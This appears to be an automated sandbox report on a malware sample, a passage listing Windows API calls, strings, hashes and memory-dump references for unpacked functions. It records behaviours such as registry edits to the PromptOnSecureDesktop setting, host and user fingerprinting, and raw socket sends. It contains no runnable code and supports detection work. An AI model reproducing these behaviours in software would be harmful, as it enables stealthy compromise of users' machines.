                                                                                        • Opcode ID: 00222842cf4b27377529e63430db8cbc0b0fb89ac28641eb4cfa7891be51bad4
                                                                                        • Instruction ID: 5047c4a85d7ce053583ecb6bfb553561e79882e3d1eaa06aec664d00f8baf4e0
                                                                                        • Opcode Fuzzy Hash: 00222842cf4b27377529e63430db8cbc0b0fb89ac28641eb4cfa7891be51bad4
                                                                                        • Instruction Fuzzy Hash: 1AF0E971604204AFD7505FA5BC84BB53FA4EB48353F008077E109D22A8C77455898F2E
                                                                                        APIs
                                                                                        • GetTickCount.KERNEL32 ref: 0261C6B4
                                                                                        • InterlockedIncrement.KERNEL32(0261C74B), ref: 0261C715
                                                                                        • CreateThread.KERNEL32(00000000,00000000,0040B535,00000000,?,0261C747), ref: 0261C728
                                                                                        • CloseHandle.KERNEL32(00000000,?,0261C747,00413588,02618A77), ref: 0261C733
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2081215356.0000000002610000.00000040.00001000.00020000.00000000.sdmp, Offset: 02610000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CloseCountCreateHandleIncrementInterlockedThreadTick
                                                                                        • String ID: localcfg
                                                                                        • API String ID: 1026198776-1857712256
                                                                                        • Opcode ID: 7930164416072ce379d69f2024e67a12fb5078e265013c4e4f79f9c65834da75
                                                                                        • Instruction ID: 81627d23570bb100ce28012f81dabe9075870426df43f2b6a42b2991bd62cdea
                                                                                        • Opcode Fuzzy Hash: 7930164416072ce379d69f2024e67a12fb5078e265013c4e4f79f9c65834da75
                                                                                        • Instruction Fuzzy Hash: 9B518CB1A40B418FC7248F69C9D462ABBE9FB48300B64693FE18BC7A90D774F840CB51
                                                                                        APIs
                                                                                        • RegOpenKeyExA.ADVAPI32(80000001,00000000,?,?,00000000,00000101,?,?,?,?,75920F10,00000000), ref: 0040815F
                                                                                        • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,0040A45F,?,?,00000000,00000101,?,?,?,?,75920F10,00000000), ref: 00408187
                                                                                        • RegQueryValueExA.ADVAPI32(?,?,00000000,00000001,00000000,0040A45F,?,?,00000000,00000101,?,?,?,?,75920F10,00000000), ref: 004081BE
                                                                                        • RegCloseKey.ADVAPI32(?,?,?,00000000,00000101,?,?,?,?,75920F10,00000000), ref: 00408210
                                                                                          • Part of subcall function 0040675C: SetFileAttributesA.KERNEL32(?,00000080,?,75920F10,00000000), ref: 0040677E
                                                                                          • Part of subcall function 0040675C: CreateFileA.KERNELBASE(?,80000000,00000003,00000000,00000003,00000080,00000000,?,75920F10,00000000), ref: 0040679A
                                                                                          • Part of subcall function 0040675C: CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000004,00000000,?,75920F10,00000000), ref: 004067B0
                                                                                          • Part of subcall function 0040675C: SetFileAttributesA.KERNEL32(?,00000002,?,75920F10,00000000), ref: 004067BF
                                                                                          • Part of subcall function 0040675C: GetFileSize.KERNEL32(000000FF,00000000,?,75920F10,00000000), ref: 004067D3
                                                                                          • Part of subcall function 0040675C: ReadFile.KERNELBASE(000000FF,?,00000040,00408244,00000000,?,75920F10,00000000), ref: 00406807
                                                                                          • Part of subcall function 0040675C: SetFilePointer.KERNELBASE(000000FF,?,00000000,00000000,?,75920F10,00000000), ref: 0040681F
                                                                                          • Part of subcall function 0040675C: ReadFile.KERNELBASE(000000FF,?,000000F8,?,00000000,?,75920F10,00000000), ref: 0040683E
                                                                                          • Part of subcall function 0040675C: SetFilePointer.KERNELBASE(000000FF,?,00000000,00000000,?,75920F10,00000000), ref: 0040685C
                                                                                          • Part of subcall function 0040EC2E: GetProcessHeap.KERNEL32(00000000,'@,00000000,0040EA27,00000000), ref: 0040EC41
                                                                                          • Part of subcall function 0040EC2E: HeapFree.KERNEL32(00000000), ref: 0040EC48
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2079321759.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: File$AttributesCreateHeapPointerQueryReadValue$CloseFreeOpenProcessSize
                                                                                        • String ID: PromptOnSecureDesktop
                                                                                        • API String ID: 124786226-2980165447
                                                                                        • Opcode ID: f41c48beccc796d99ac39a3e9a8e7a8285e468a1565ebf528982a8b7ec716e81
                                                                                        • Instruction ID: c6ff5cc28a73505882571aaa3479db7aabb841166acb9389a4089cab67cb233b
                                                                                        • Opcode Fuzzy Hash: f41c48beccc796d99ac39a3e9a8e7a8285e468a1565ebf528982a8b7ec716e81
                                                                                        • Instruction Fuzzy Hash: 6641A2B1801109BFEB10EBA19E81DEF777CDB04304F1448BFF545F2182EAB85A948B59
                                                                                        APIs
                                                                                        • RegCreateKeyExA.ADVAPI32(80000001,0261E50A,00000000,00000000,00000000,00020106,00000000,0261E50A,00000000,000000E4), ref: 0261E319
                                                                                        • RegSetValueExA.ADVAPI32(0261E50A,?,00000000,00000003,80000001,000FF000,?,?,?,?,000000C8,PromptOnSecureDesktop), ref: 0261E38E
                                                                                        • RegDeleteValueA.ADVAPI32(0261E50A,?,?,?,?,?,000000C8,PromptOnSecureDesktop), ref: 0261E3BF
                                                                                        • RegCloseKey.ADVAPI32(0261E50A,?,?,?,?,000000C8,PromptOnSecureDesktop,?,?,?,?,?,?,?,?,0261E50A), ref: 0261E3C8
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2081215356.0000000002610000.00000040.00001000.00020000.00000000.sdmp, Offset: 02610000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Value$CloseCreateDelete
                                                                                        • String ID: PromptOnSecureDesktop
                                                                                        • API String ID: 2667537340-2980165447
                                                                                        • Opcode ID: 71be46fcf4b4c1b855c56a8beb8c548cd5d416d4e28516e03566d8543fb954ad
                                                                                        • Instruction ID: e325552437fefec6247cb9df89fe0360f1a95a2c3d9e82bedb1b5976a74bf9aa
                                                                                        • Opcode Fuzzy Hash: 71be46fcf4b4c1b855c56a8beb8c548cd5d416d4e28516e03566d8543fb954ad
                                                                                        • Instruction Fuzzy Hash: F3214C71A0021DABDF209FA4EC89EDE7F79EF08750F088025F905E6160E372DA54DBA0
                                                                                        APIs
                                                                                        • RegCreateKeyExA.ADVAPI32(80000001,0040E2A3,00000000,00000000,00000000,00020106,00000000,0040E2A3,00000000,000000E4), ref: 0040E0B2
                                                                                        • RegSetValueExA.ADVAPI32(0040E2A3,?,00000000,00000003,80000001,000FF000,?,?,?,?,000000C8,PromptOnSecureDesktop), ref: 0040E127
                                                                                        • RegDeleteValueA.ADVAPI32(0040E2A3,?,?,?,?,?,000000C8,PromptOnSecureDesktop), ref: 0040E158
                                                                                        • RegCloseKey.ADVAPI32(0040E2A3,?,?,?,?,000000C8,PromptOnSecureDesktop,?,?,?,?,?,?,?,?,0040E2A3), ref: 0040E161
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2079321759.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Value$CloseCreateDelete
                                                                                        • String ID: PromptOnSecureDesktop
                                                                                        • API String ID: 2667537340-2980165447
                                                                                        • Opcode ID: 72ec9626f1a57597f212d5c6e724b1b36c6131d7c0d684d5184da94b21603b05
                                                                                        • Instruction ID: af4a942e7328ea1ce2cdf979f73f75556816175b5134196b99f0fb832a21e1c2
                                                                                        • Opcode Fuzzy Hash: 72ec9626f1a57597f212d5c6e724b1b36c6131d7c0d684d5184da94b21603b05
                                                                                        • Instruction Fuzzy Hash: 2F218071A00219BBDF209FA6EC89EDF7F79EF08754F008072F904A6190E6718A64DB94
                                                                                        APIs
                                                                                        • GetUserNameA.ADVAPI32(?,?), ref: 026171E1
                                                                                        • LookupAccountNameA.ADVAPI32(00000000,?,?,?,?,?,?), ref: 02617228
                                                                                        • LocalFree.KERNEL32(?,?,?), ref: 02617286
                                                                                        • wsprintfA.USER32 ref: 0261729D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2081215356.0000000002610000.00000040.00001000.00020000.00000000.sdmp, Offset: 02610000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Name$AccountFreeLocalLookupUserwsprintf
                                                                                        • String ID: |
                                                                                        • API String ID: 2539190677-2343686810
                                                                                        • Opcode ID: 0c0665c49b02975d3cb655efb4674a53369201e8279effc4896e63a6fe97e42a
                                                                                        • Instruction ID: fad81b6df7a659c36631617c3ba25fa3611afa948bde9daf47b11c6f7152742c
                                                                                        • Opcode Fuzzy Hash: 0c0665c49b02975d3cb655efb4674a53369201e8279effc4896e63a6fe97e42a
                                                                                        • Instruction Fuzzy Hash: 4C311A72900208BBDB01DFA8DC45BDA7BACEF04314F18C066F959DB200EB75E6498B94
                                                                                        APIs
                                                                                        • gethostname.WS2_32(?,00000080), ref: 0040AD1C
                                                                                        • lstrlenA.KERNEL32(00000000), ref: 0040AD60
                                                                                        • lstrlenA.KERNEL32(00000000), ref: 0040AD69
                                                                                        • lstrcpyA.KERNEL32(00000000,LocalHost), ref: 0040AD7F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2079321759.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: lstrlen$gethostnamelstrcpy
                                                                                        • String ID: LocalHost
                                                                                        • API String ID: 3695455745-3154191806
                                                                                        • Opcode ID: 8a17093f3d26383e77935b758fdadb31e519a4398e40a43d70c627834661f375
                                                                                        • Instruction ID: 5e983dddb47fd7e780230f110e9d304ee880480ae48faa8370a3fb9af9ed59c3
                                                                                        • Opcode Fuzzy Hash: 8a17093f3d26383e77935b758fdadb31e519a4398e40a43d70c627834661f375
                                                                                        • Instruction Fuzzy Hash: FA0149208443895EDF3107289844BEA3F675F9670AF104077E4C0BB692E77C8893835F
                                                                                        APIs
                                                                                        • GetLocalTime.KERNEL32(?), ref: 0261B51A
                                                                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0261B529
                                                                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 0261B548
                                                                                        • GetTimeZoneInformation.KERNEL32(?), ref: 0261B590
                                                                                        • wsprintfA.USER32 ref: 0261B61E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2081215356.0000000002610000.00000040.00001000.00020000.00000000.sdmp, Offset: 02610000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Time$File$Local$InformationSystemZonewsprintf
                                                                                        • String ID:
                                                                                        • API String ID: 4026320513-0
                                                                                        • Opcode ID: fbb2cc535003bdd2a03704f06e43c86ec17b275768f9954b8d174276db173d5b
                                                                                        • Instruction ID: 15d6b95d7fd125e3af2a84259e5af47986dd72d790a7e8b23b44dbe49d57ca9d
                                                                                        • Opcode Fuzzy Hash: fbb2cc535003bdd2a03704f06e43c86ec17b275768f9954b8d174276db173d5b
                                                                                        • Instruction Fuzzy Hash: 9A5120B1D0021CAACF18DFD5D8885EEBBB9BF48304F14816AF505B6150E7B85AC9CF98
                                                                                        APIs
                                                                                        • IsBadHugeReadPtr.KERNEL32(?,00000014), ref: 02616303
                                                                                        • LoadLibraryA.KERNEL32(?), ref: 0261632A
                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 026163B1
                                                                                        • IsBadHugeReadPtr.KERNEL32(-000000DC,00000014), ref: 02616405
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2081215356.0000000002610000.00000040.00001000.00020000.00000000.sdmp, Offset: 02610000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: HugeRead$AddressLibraryLoadProc
                                                                                        • String ID:
                                                                                        • API String ID: 3498078134-0
                                                                                        • Opcode ID: 22151fd6ac6a99dd14e45186f4812a7dac7af9c00bb3bb0eb99ee7530713bb62
                                                                                        • Instruction ID: a3435f7e49f3e0b063e0a6b58528d568fccb2ede967e67d119da2454c1dc8c3f
                                                                                        • Opcode Fuzzy Hash: 22151fd6ac6a99dd14e45186f4812a7dac7af9c00bb3bb0eb99ee7530713bb62
                                                                                        • Instruction Fuzzy Hash: 8C413A79A00219EFDB14CF58C884BA9B7B8FF04358F188169E965D7390E771F951CB90
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2079321759.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 7d7be85cd36f3663e93a2a6933a3c0dd16534f9087a3b26c869853f350d83737
                                                                                        • Instruction ID: 0bfd2bf0caf83722c61519a9099cbfb16c0865a6a5fe5c2769a2057d5fd36f2a
                                                                                        • Opcode Fuzzy Hash: 7d7be85cd36f3663e93a2a6933a3c0dd16534f9087a3b26c869853f350d83737
                                                                                        • Instruction Fuzzy Hash: 2931A471A00219ABCB109FA6CD85ABEB7F4FF48705F10846BF504F62C1E7B8D6418B68
                                                                                        APIs
                                                                                          • Part of subcall function 0040DD05: GetTickCount.KERNEL32 ref: 0040DD0F
                                                                                          • Part of subcall function 0040DD05: InterlockedExchange.KERNEL32(004136B4,00000001), ref: 0040DD44
                                                                                          • Part of subcall function 0040DD05: GetCurrentThreadId.KERNEL32 ref: 0040DD53
                                                                                        • lstrcmpA.KERNEL32(75920F18,00000000,?,75920F10,00000000,?,00405EC1), ref: 0040E693
                                                                                        • lstrcpynA.KERNEL32(00000008,00000000,0000000F,?,75920F10,00000000,?,00405EC1), ref: 0040E6E9
                                                                                        • lstrcmpA.KERNEL32(?,00000008,?,75920F10,00000000,?,00405EC1), ref: 0040E722
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2079321759.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: lstrcmp$CountCurrentExchangeInterlockedThreadTicklstrcpyn
                                                                                        • String ID: A$ A
                                                                                        • API String ID: 3343386518-686259309
                                                                                        • Opcode ID: 951ece8c2afd944643beef7ac70d50e077dd33d1a65e809f7a70b3905a3fc363
                                                                                        • Instruction ID: 47b803fc1c440cad9c550ff35358ad860d5bc2ca4051ff98ce99c32b6473ed9c
                                                                                        • Opcode Fuzzy Hash: 951ece8c2afd944643beef7ac70d50e077dd33d1a65e809f7a70b3905a3fc363
                                                                                        • Instruction Fuzzy Hash: CC31C031600301DBCB318F66E8847977BE4AB24314F508D3BE555A7690D779E8A0CB89
                                                                                        APIs
                                                                                        • GetTickCount.KERNEL32 ref: 0040272E
                                                                                        • htons.WS2_32(00000001), ref: 00402752
                                                                                        • htons.WS2_32(0000000F), ref: 004027D5
                                                                                        • htons.WS2_32(00000001), ref: 004027E3
                                                                                        • sendto.WS2_32(?,00412BF8,00000009,00000000,00000010,00000010), ref: 00402802
                                                                                          • Part of subcall function 0040EBCC: GetProcessHeap.KERNEL32(00000000,00000000,80000001,0040EBFE,7FFF0001,?,0040DB55,7FFF0001), ref: 0040EBD3
                                                                                          • Part of subcall function 0040EBCC: RtlAllocateHeap.NTDLL(00000000,?,0040DB55,7FFF0001), ref: 0040EBDA
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2079321759.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: htons$Heap$AllocateCountProcessTicksendto
                                                                                        • String ID:
                                                                                        • API String ID: 1128258776-0
                                                                                        • Opcode ID: 6299894b8f3bc0cc0dfae645a3d09159b09bee40e3d6069153e68f679ff52250
                                                                                        • Instruction ID: e317574a351225f02cdc10e669db3389ba019fd1a924c3d0ab3f78f3d9a30560
                                                                                        • Opcode Fuzzy Hash: 6299894b8f3bc0cc0dfae645a3d09159b09bee40e3d6069153e68f679ff52250
                                                                                        • Instruction Fuzzy Hash: B8313A342483969FD7108F74DD80AA27760FF19318B19C07EE855DB3A2D6B6E892D718
                                                                                        APIs
                                                                                        • setsockopt.WS2_32(00000000,0000FFFF,00000004,00000000,00000004), ref: 0040F2A0
                                                                                        • setsockopt.WS2_32(00000004,0000FFFF,00001005,00000004,00000004), ref: 0040F2C0
                                                                                        • setsockopt.WS2_32(00000004,0000FFFF,00001006,00000004,00000004), ref: 0040F2DD
                                                                                        • setsockopt.WS2_32(?,00000006,00000001,?,00000004), ref: 0040F2EC
                                                                                        • setsockopt.WS2_32(?,0000FFFF,00000080,?,00000004), ref: 0040F2FD
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2079321759.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: setsockopt
                                                                                        • String ID:
                                                                                        • API String ID: 3981526788-0
                                                                                        • Opcode ID: 8b4be0266ee07c3102769aa2bfb0f3fbe40b153d7f42fbd5c93fb3948aedae23
                                                                                        • Instruction ID: 54276ff97121d9260d4f5268cf3942b14174050ddbce03adff589c8218e6c2bb
                                                                                        • Opcode Fuzzy Hash: 8b4be0266ee07c3102769aa2bfb0f3fbe40b153d7f42fbd5c93fb3948aedae23
                                                                                        • Instruction Fuzzy Hash: 6B110AB2A40248BAEF11DF94CD85FDE7FBCEB44751F008066BB04EA1D0E6B19A44CB94
                                                                                        APIs
                                                                                        • lstrlenA.KERNEL32(?,localcfg,?,00000000,?,?,00402491,?,?,?,0040E844,-00000030,?,?,?,00000001), ref: 00402429
                                                                                        • lstrlenA.KERNEL32(?,?,00402491,?,?,?,0040E844,-00000030,?,?,?,00000001,00401E3D,00000001,localcfg,lid_file_upd), ref: 0040243E
                                                                                        • lstrcmpiA.KERNEL32(?,?), ref: 00402452
                                                                                        • lstrlenA.KERNEL32(?,?,00402491,?,?,?,0040E844,-00000030,?,?,?,00000001,00401E3D,00000001,localcfg,lid_file_upd), ref: 00402467
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2079321759.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: lstrlen$lstrcmpi
                                                                                        • String ID: localcfg
                                                                                        • API String ID: 1808961391-1857712256
                                                                                        • Opcode ID: e0652b8e6b882c26303073c97bc729d70adad1496f82cefeb83b9b40d862f6ea
                                                                                        • Instruction ID: 10b525c6ae3f8891cd48fd25e34f392daf9ed257baad57177c8ccf48abf1fcea
                                                                                        • Opcode Fuzzy Hash: e0652b8e6b882c26303073c97bc729d70adad1496f82cefeb83b9b40d862f6ea
                                                                                        • Instruction Fuzzy Hash: B4011A31600218EFCF11EF69DD888DE7BA9EF44354B01C436E859A7250E3B4EA408A98
                                                                                        APIs
                                                                                          • Part of subcall function 0261DF6C: GetCurrentThreadId.KERNEL32 ref: 0261DFBA
                                                                                        • GetFileSize.KERNEL32(00000000,00000000,?,00410170,?,00000000,?,0261A6AC), ref: 0261E7BF
                                                                                        • ReadFile.KERNEL32(00000000,004136C4,00000000,?,00000000,?,00410170,?,00000000,?,0261A6AC), ref: 0261E7EA
                                                                                        • CloseHandle.KERNEL32(00000000,?,00410170,?,00000000,?,0261A6AC), ref: 0261E819
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2081215356.0000000002610000.00000040.00001000.00020000.00000000.sdmp, Offset: 02610000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: File$CloseCurrentHandleReadSizeThread
                                                                                        • String ID: PromptOnSecureDesktop
                                                                                        • API String ID: 1396056608-2980165447
                                                                                        • Opcode ID: 7902eb09b18f90ff15814c2c52a49d831fada2081c22b3094fea9a8900fad251
                                                                                        • Instruction ID: 67e000de15eb880f395fef5b6465c989916299eeb20c85a23fa6c4fd7ad3b2d6
                                                                                        • Opcode Fuzzy Hash: 7902eb09b18f90ff15814c2c52a49d831fada2081c22b3094fea9a8900fad251
                                                                                        • Instruction Fuzzy Hash: CE21E7B1A403107AE22077619C05FEB3E5DDF65760F18042CBE09A51E2FA56F5508AF9
                                                                                        APIs
                                                                                          • Part of subcall function 0040DD05: GetTickCount.KERNEL32 ref: 0040DD0F
                                                                                          • Part of subcall function 0040DD05: InterlockedExchange.KERNEL32(004136B4,00000001), ref: 0040DD44
                                                                                          • Part of subcall function 0040DD05: GetCurrentThreadId.KERNEL32 ref: 0040DD53
                                                                                        • GetFileSize.KERNEL32(00000000,00000000,?,75920F10,?,00000000,?,0040A445), ref: 0040E558
                                                                                        • ReadFile.KERNEL32(00000000,?,00000000,?,00000000,?,75920F10,?,00000000,?,0040A445), ref: 0040E583
                                                                                        • CloseHandle.KERNEL32(00000000,?,75920F10,?,00000000,?,0040A445), ref: 0040E5B2
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2079321759.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: File$CloseCountCurrentExchangeHandleInterlockedReadSizeThreadTick
                                                                                        • String ID: PromptOnSecureDesktop
                                                                                        • API String ID: 3683885500-2980165447
                                                                                        • Opcode ID: ea61079883e1d137724bdb03d89989e3cb326a6ab799ec698869bd57d3053e24
                                                                                        • Instruction ID: 336cca8f28a0ae06816d6806ca3c094c6326420f96deeb8fe64773c8e7208e17
                                                                                        • Opcode Fuzzy Hash: ea61079883e1d137724bdb03d89989e3cb326a6ab799ec698869bd57d3053e24
                                                                                        • Instruction Fuzzy Hash: F321EAB19402047AE2207B639C0AFAB3D1CDF54758F10093EBA09B11E3E9BDD96082BD
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNEL32(Iphlpapi.dll,00000000,localcfg,?,hi_id,?,?,?,?,00000001), ref: 00401AD4
                                                                                        • GetProcAddress.KERNEL32(00000000,GetAdaptersAddresses), ref: 00401AE9
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2079321759.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AddressLibraryLoadProc
                                                                                        • String ID: GetAdaptersAddresses$Iphlpapi.dll
                                                                                        • API String ID: 2574300362-1087626847
                                                                                        • Opcode ID: 4ad453f95e319ae71f8ebabcc46d8d27ffdc7fe226df516f9f2c7e6519cf6946
                                                                                        • Instruction ID: f6c238f91e07a5798e813b0b618c72a9a5addbcd8e0b61e0281ff71d4ef1483f
                                                                                        • Opcode Fuzzy Hash: 4ad453f95e319ae71f8ebabcc46d8d27ffdc7fe226df516f9f2c7e6519cf6946
                                                                                        • Instruction Fuzzy Hash: 3D11DA71E01124BFCB11DBA5DD858EEBBB9EB44B10B144077E005F72A1E7786E80CB98
                                                                                        APIs
                                                                                        • RegOpenKeyExA.ADVAPI32(80000002,00000000,00020119,?), ref: 026176D9
                                                                                        • RegEnumKeyA.ADVAPI32(?,00000000,?,00000104), ref: 0261796D
                                                                                        • RegCloseKey.ADVAPI32(?), ref: 0261797E
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2081215356.0000000002610000.00000040.00001000.00020000.00000000.sdmp, Offset: 02610000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CloseEnumOpen
                                                                                        • String ID: PromptOnSecureDesktop
                                                                                        • API String ID: 1332880857-2980165447
                                                                                        • Opcode ID: 6add54f53aa26b9129486f5997ff6e8fcd40a3645fc937a9d882d7137db5ef12
                                                                                        • Instruction ID: 58e2c07248714328547af40f32b9929b72d58b1c14348791d9243b959690ccdc
                                                                                        • Opcode Fuzzy Hash: 6add54f53aa26b9129486f5997ff6e8fcd40a3645fc937a9d882d7137db5ef12
                                                                                        • Instruction Fuzzy Hash: 7411E170A00249AFDB128F69DC44FEFBF79EF51304F180155F514E6290E7B19A40CBA0
                                                                                        APIs
                                                                                          • Part of subcall function 00401AC3: LoadLibraryA.KERNEL32(Iphlpapi.dll,00000000,localcfg,?,hi_id,?,?,?,?,00000001), ref: 00401AD4
                                                                                          • Part of subcall function 00401AC3: GetProcAddress.KERNEL32(00000000,GetAdaptersAddresses), ref: 00401AE9
                                                                                        • GetComputerNameA.KERNEL32(?,0000000F), ref: 00401C15
                                                                                        • GetVolumeInformationA.KERNEL32(00000000,00000000,00000004,00000001,00000000,00000000,00000000,00000000,?,?,?,?,00000001), ref: 00401C51
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2079321759.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AddressComputerInformationLibraryLoadNameProcVolume
                                                                                        • String ID: hi_id$localcfg
                                                                                        • API String ID: 2777991786-2393279970
                                                                                        • Opcode ID: 8706900559274ba91d770fb8bb1d60ecae66f9331a84d665d36368a2f022e804
                                                                                        • Instruction ID: b3a67a5cb4ed68e183e77afdc8505cc80d304e276af6d439446d09174096bcc5
                                                                                        • Opcode Fuzzy Hash: 8706900559274ba91d770fb8bb1d60ecae66f9331a84d665d36368a2f022e804
                                                                                        • Instruction Fuzzy Hash: B2018072A44118BBEB10EAE8C8C59EFBABCAB48745F104476E602F3290D274DE4486A5
                                                                                        APIs
                                                                                        • RegOpenKeyExA.ADVAPI32(80000001,00000000), ref: 0261999D
                                                                                        • RegDeleteValueA.ADVAPI32(?,00000000), ref: 026199BD
                                                                                        • RegCloseKey.ADVAPI32(?), ref: 026199C6
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2081215356.0000000002610000.00000040.00001000.00020000.00000000.sdmp, Offset: 02610000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CloseDeleteOpenValue
                                                                                        • String ID: PromptOnSecureDesktop
                                                                                        • API String ID: 849931509-2980165447
                                                                                        • Opcode ID: ecc939a75216a7bc4a9662cd8f3630595b0eae10caf242afcee65d599bec8ec6
                                                                                        • Instruction ID: 7071e891a5652647fd639e25e159cfc7886fe9c667b34a72f6f58ebe9f28d9c7
                                                                                        • Opcode Fuzzy Hash: ecc939a75216a7bc4a9662cd8f3630595b0eae10caf242afcee65d599bec8ec6
                                                                                        • Instruction Fuzzy Hash: 30F0F6B2680218BBF7106B50EC06FDB3A2CDB94B10F140064FA05B5091F6E5AA9086BD
                                                                                        APIs
                                                                                        • RegOpenKeyExA.ADVAPI32(80000001,00000000,PromptOnSecureDesktop,00000000,?,?,0040A14A), ref: 00409736
                                                                                        • RegDeleteValueA.ADVAPI32(0040A14A,00000000,?,?,?,?,?,?,?,?,?,0040A14A), ref: 00409756
                                                                                        • RegCloseKey.ADVAPI32(0040A14A,?,?,?,?,?,?,?,?,?,0040A14A), ref: 0040975F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2079321759.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CloseDeleteOpenValue
                                                                                        • String ID: PromptOnSecureDesktop
                                                                                        • API String ID: 849931509-2980165447
                                                                                        • Opcode ID: 2a8abeb1ae8c575472f9bd74b3adb91cbf41d09789710805d0faf142c4fb6012
                                                                                        • Instruction ID: 5e38ed9511aa8cc069582274463af9cddeeab7037fd65aad7bdf8be664a95ff7
                                                                                        • Opcode Fuzzy Hash: 2a8abeb1ae8c575472f9bd74b3adb91cbf41d09789710805d0faf142c4fb6012
                                                                                        • Instruction Fuzzy Hash: 5AF0C8B2680118BBF3106B51AC0BFDF3A2CDB44704F100075F605B50D2E6E55E9082BD
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2081215356.0000000002610000.00000040.00001000.00020000.00000000.sdmp, Offset: 02610000, based on PE: false
                                                                                        Yara matches
